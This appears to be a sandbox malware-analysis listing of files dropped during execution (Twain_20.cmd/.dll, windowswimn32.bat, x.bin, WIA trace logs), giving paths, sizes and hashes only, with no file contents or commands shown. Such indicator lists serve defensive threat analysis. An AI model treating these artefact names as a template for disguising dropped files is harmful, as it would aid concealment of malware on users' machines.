196e7ef12447e97e3be7a7c20fd69d0d1377364def9059e8eacf05a98a003fdc0470c9e88f662d38db7c54c24135d165bbe59f32b49aaeba5e91e6941725edf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize
890B

MD5
43bc6fb4ad87d3349b94ee758b39a6fe

SHA1
6fb1f6080aa5dd2f246787e41ea077962271d96e

SHA256
80e9b7c719aa2c3b4eb0fcf4e53b8e527f5c4b091de06c18eeecc32d5b9ac0f5

SHA512
4b264610321be3534fe655d35280489624971a74a013a0b41d22049805f24be1f54fb36a051079c476b87d079122c311153839890033b4d467c37b34d78da5ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize
287B

MD5
0eafc7e411bc95b074c8ea60b00b1f6c

SHA1
7a63173a486dd28e4159716b19b0ff838a6bfae1

SHA256
45b48741270f8f74abbb703bf41496ae1a447ce659cee66e4583e6f96e82617a

SHA512
fb71f2f1d0e05202420a1426f8e5d509f645a613c2d20d64c5d78a559f0bca7f8067e9be4665c6c2a21e7c3aa836238872430903ebd821063e1bcfbb38d404a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize
11B

MD5
9905e5a33c6edd8eb5f59780afbf74de

SHA1
64b2cd0186ff6fe05072ee88e2bb54476023772e

SHA256
c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3

SHA512
e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.dll
Filesize
32KB

MD5
36deca5bd53f31d062d07c1d3fa0cc8d

SHA1
1d245de03d3725b180f572b15036cbb168445edf

SHA256
d6607a9ec5fc0698f50382ffe61a4ad1f36a8b26c0834c305f40e41647980668

SHA512
e1253113a5dfd1cd7e93dfe45649d89e072db432b1724aaf36c7b082b38e770c4755e4d01c136134bb9356f74daa1e7205e5fa43f575edb5013a91f738be71c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
33B

MD5
4732b0f9e53c40b0863e4db4e1caf930

SHA1
bf33dd224c8c457ca3bcbf21eb7e40b34e6be074

SHA256
c2f9b3d18d8c8d4803a3cc87343241ba73e143ea05d9bbbe725143b91329165a

SHA512
35e65d2f06e7bd60f58ba331e8422923fe446a713f6593124d96f76fbf86758639747c6bbc5c808c8089ddcdf24470e0b02b145763d0e091138171da1eaf40e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
55B

MD5
57a059b0f2cda5f4a0536577dcbc64af

SHA1
4a5424719c20b318b7c76eb80566eef896553d8b

SHA256
c767341b56cac24d9369f237d40d908be9bfd102dd1823327405f39424531864

SHA512
3d890832eea007c4b20030bc93fd09cb7712901ed52f8a80ec5145321a1507f0fec890087e8c06e5a665bd0debe76aacf6e4f739a9f6e4b209df1dbffd26807a

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
77B

MD5
a4a7caf4378513b47eb28f76f338576d

SHA1
822cc5b7b3123fb1d75202a2de8d3582945b1b4b

SHA256
d97db100ee267f071e213d0005552ce69cffe560a06ddb6010b3f158580201dd

SHA512
095e1b771565fb1b68275a301a598463ce2ea1403619a5f24dd39a26eb880060b42afeb167bf1ae8f76352af5fa033cdbcab9d6ee793eed03b11eeb2fbd6a0e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
87B

MD5
ec687bebeb045b0b7b30ac9742ff70f2

SHA1
8c48b82b81d6c1a546215caf58a9d56890872b14

SHA256
5e2e70a75b88f3de0a6eaecfbfb6b08d162420bc7046659f8afcacefc2de5d3b

SHA512
fd24d4f4e5c891c67f2ba31068f9604ffaead75744f7ccba7a2ad9c1e6c98eff90ac7743420fe5f668aba3ff6a29a9addb176fc27e54272899cb1263b587219c

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
22B

MD5
fe669e0a3a56961fba38ef9b7f7d01dd

SHA1
338b6f4a3ec71587d53aec450ca5448928f966a1

SHA256
138b48a413afa60daa506090fa4332d913a1f9d895b6c289c36dd7db00019d64

SHA512
ff0bc50cef59421253578172602a56f9f9b3a8988a16576eaf8a004792d330c708dbed95f5f4074fb2eec36d7df7f4a0392c88420d2b0678cd907056a23cd41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
44B

MD5
ea260c435f9eb83e2b5041e734ff3598

SHA1
ca70d64367cbdffbbf24e82baff4048119203a2e

SHA256
3ade659fdae17c11c3f42b712f94045691fbd0b413428b73e1de8fe699e74615

SHA512
548624cc523aeb4136376f792d23b3f2aee4a676362f8a0dd0e8161f0df87ab926b82f67fc174eb5d9473c23f49e6ca962bc84479967f7e624250d94efa66876

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
49B

MD5
cfb046d3c9513b92c1b287da26f97c28

SHA1
ea8208c4dad826b7fdb3b5b728863a95e86d4383

SHA256
a06f170d4f92bf290e38b0ce1c05bb59c95de2797b1a5253b949ad7e1be9818b

SHA512
dbeeea4d284f59e1455a5426334caa02458e88833aeece9817c51be616697ca4c399b2a9d0e8e44bf4a5ee63d0b37c0aed68c01f1748fa5a23ed6d2af62b3340

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.bin
Filesize
24KB

MD5
2e40c97f7790fed7606c2ab881340ce5

SHA1
b45ccff0eaffed71c822b8ad31bf2342e5aaa2cb

SHA256
299fedc96d0eaf4f1bf6398fb9c8d30b1f3f10571e834b93432bb02297b0648f

SHA512
339a2e2e931890628aee8e708a8f5d2057e8ca3a40c48689852867d99d1c56ee926f192ab3893201823ce25b0174384fcbf1e1fe7567eb11beed3babcd8e7b53

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
3KB

MD5
0415beae6aaa86d022ca5bf7b2e71f0d

SHA1
59c8c6d88ce9f3129580c879e2cd83a42ce3becf

SHA256
f9bdb898f561c9c281fb533bf19510edd856a4a93a5e6a73c7a4c3710fa3669b

SHA512
904bac218278001836f4c231ddf2a024db7e17a69540a5524a51c8e637b1daa78403d757de20f31dcad8eb0e3deb50605a6464d3a98cb5693c8f870059fc1038

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
4KB

MD5
1de0c6642204ac19da986d10a8e31349

SHA1
532a90a40e6d042caa81b734cf71fc2038f86478

SHA256
ea93f846550b68a1256175427c691a06c935d5d14f850009e5c8af58c89a4c2f

SHA512
9550c0e9a75f97e2ec4fec035d176da8ed479600757d14c2c1162babaf38793eb710d67714d8cb0578194dfa73fc89c82fe6d8f2eabf0aee825ddbf99a569e83

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
6KB

MD5
c056d53af9edf8ca2010d3db051b1cb8

SHA1
88775cb275254fa28cefcff6c0b7c2b7c84526ef

SHA256
46334f0e79f062bc69f110cd5fbfaf575726a7ea605184d04c561ef543b827d3

SHA512
b747c96e4c4690dbae708915c3160ce3df3908ff3d2a4fb0491700f7ee29908b870ad454baccf848de54058c8f2ba98618de1912ba22b92fd43755ba98a8a377

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
7KB

MD5
adf50739c3bba2b5a9ab4f9a1b315ac6

SHA1
60924f185f97db52ccca60288cf67f7b1ed7e8d7

SHA256
24869ffa50a5d6aea3570b58c92aa811923677837d84392918989b7006fedef8

SHA512
bac35c5c2fb92809c4e5aaf436b6a536f2e2215eb53439dfd462ac5b8bb473ac4d1108ac7541084539b8ec63a85e841ca4f37aee57d6ccdfb8a219515cd5e71b

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
9KB

MD5
fd00201cd56a43bd3a10e463b3cd9af4

SHA1
3e9b5b3be006f8cdebc64cea94b47372f528f8bb

SHA256
704afe068c35feb178bf18c69610f99eab5afb762606f19278e2e51255aeaffc

SHA512
42143e69aee9bdf71acf1e0ea1f57d32386cfb9dba4b40757c01baa91d2fd8a44537cb775e9a752719891f2530f3457ac3fcb0b955ff9efbd13d2e2895b420de

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
10KB

MD5
4ebefa3fb0a3daf47a30ef9ba799e6ef

SHA1
6b212dece7aa7c7cbcd5e6d4985bee011a73e195

SHA256
332b6eda651a87b03c52be1216b2158c8f80e153ebc6f366d03cfefd42778a18

SHA512
a19d4148e8d6ef734543cbf5474449bf9aec2c1b4defb7a69f703e757acf25d6142f787a1681c201affa816a6caa6bd7ab84ce29cb8e6a9e81c77452491dd75a

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
12KB

MD5
635f90a82ff6dbb6aff1417d860ec5b3

SHA1
b633c59fbb61d20b46608be4cd8fa10458ee8936

SHA256
3597d1266ec0e455a0cd53c57a8fd695090c0aca2611df1a179f7eb99365daed

SHA512
e175266746229df627520615a3ddde80bfe5724b0d6a5fc854ab7e223d71681b241fa3bf807bf4989530a090514a62c7b9f40fa85be590a6fe9c4aa7b56e523c

Download Submit